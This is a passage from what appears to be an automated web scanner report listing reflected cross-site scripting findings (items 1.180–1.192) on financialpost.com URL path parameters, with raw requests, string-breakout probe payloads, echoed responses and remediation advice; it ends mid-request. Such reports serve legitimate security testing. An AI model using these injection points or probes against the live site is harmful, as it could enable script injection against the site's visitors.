Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36429


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news61908';80f0b405c4b/energy/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news61908';80f0b405c4b;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=57288344?">
...[SNIP]...

1.180. http://www.financialpost.com/news/energy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ef9'%3b742404652a1 was submitted in the REST URL parameter 2. This input was echoed as f4ef9';742404652a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energyf4ef9'%3b742404652a1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36392


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energyf4ef9';742404652a1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energyf4ef9';742404652a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=72215600?">
...[SNIP]...

1.181. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96160'%3bf94decf6ed was submitted in the REST URL parameter 1. This input was echoed as 96160';f94decf6ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news96160'%3bf94decf6ed/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75926
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news96160';f94decf6ed/energy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news96160';f94decf6ed;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50020139?">
...[SNIP]...

1.182. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44511'%3b8f538e1d670 was submitted in the REST URL parameter 2. This input was echoed as 44511';8f538e1d670 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy44511'%3b8f538e1d670/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 89223
Expires: Sun, 19 Dec 2010 03:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy44511';8f538e1d670/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy44511';8f538e1d670;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68677683?">
...[SNIP]...

1.183. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3480f'%3bb1bf66ee4c8 was submitted in the REST URL parameter 4. This input was echoed as 3480f';b1bf66ee4c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy/Suncor+deal+with+Total+directional+shift+says/39959423480f'%3bb1bf66ee4c8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70550
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor-deal-with-total-directional-shift-says/39959423480f';b1bf66ee4c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor-deal-with-total-directional-shift-says;kw=39959423480f';b1bf66ee4c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookie
...[SNIP]...

1.184. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa269'%3b0b5f135b547 was submitted in the REST URL parameter 5. This input was echoed as aa269';0b5f135b547 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/aa269'%3b0b5f135b547 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38763


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor%20deal%20with%20total%20directional%20shift%20says/3995942/aa269';0b5f135b547/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor%20deal%20with%20total%20directional%20shift%20says;kw=3995942;kw=aa269';0b5f135b547;kw=npo;kw=fpo;tile='+dartad_t
...[SNIP]...

1.185. http://www.financialpost.com/news/financials/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d120'%3b5f07c23c576 was submitted in the REST URL parameter 1. This input was echoed as 1d120';5f07c23c576 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news1d120'%3b5f07c23c576/financials/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news1d120';5f07c23c576/financials/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news1d120';5f07c23c576;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44865092?">
...[SNIP]...

1.186. http://www.financialpost.com/news/financials/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a363'%3be5e52d355ae was submitted in the REST URL parameter 2. This input was echoed as 5a363';e5e52d355ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials5a363'%3be5e52d355ae/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials5a363';e5e52d355ae/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials5a363';e5e52d355ae;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=51799081?">
...[SNIP]...

1.187. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7a32'%3ba2f5d539c94 was submitted in the REST URL parameter 1. This input was echoed as a7a32';a2f5d539c94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsa7a32'%3ba2f5d539c94/financials/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85990
Expires: Sun, 19 Dec 2010 03:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsa7a32';a2f5d539c94/financials/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsa7a32';a2f5d539c94;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16955960?">
...[SNIP]...

1.188. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3c6'%3bfd6bcf5f23 was submitted in the REST URL parameter 2. This input was echoed as 4c3c6';fd6bcf5f23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials4c3c6'%3bfd6bcf5f23/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 93245
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials4c3c6';fd6bcf5f23/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials4c3c6';fd6bcf5f23;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10193409?">
...[SNIP]...

1.189. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6154'%3b04265ffa851 was submitted in the REST URL parameter 4. This input was echoed as e6154';04265ffa851 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials/steps+plate/3996039e6154'%3b04265ffa851/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76201
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps-plate/3996039e6154';04265ffa851/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps-plate;kw=3996039e6154';04265ffa851;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=59123382?
...[SNIP]...

1.190. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/financials/steps+plate/3996039/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf56e'%3bd1d11237fe0 was submitted in the REST URL parameter 5. This input was echoed as cf56e';d1d11237fe0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/financials/steps+plate/3996039/cf56e'%3bd1d11237fe0 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37971


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps%20plate/3996039/cf56e';d1d11237fe0/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps%20plate;kw=3996039;kw=cf56e';d1d11237fe0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=172
...[SNIP]...

1.191. http://www.financialpost.com/news/legal/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/legal/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9749c'%3bea6b87ad49c was submitted in the REST URL parameter 1. This input was echoed as 9749c';ea6b87ad49c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news9749c'%3bea6b87ad49c/legal/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news9749c';ea6b87ad49c/legal/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news9749c';ea6b87ad49c;kw=legal;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87926628?">
...[SNIP]...

1.192. http://www.financialpost.com/news/legal/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/legal/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de7ae'%3bad722b91cc3 was submitted in the REST URL parameter 2. This input was echoed as de7ae';ad722b91cc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/legalde7ae'%3bad722b91cc3/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
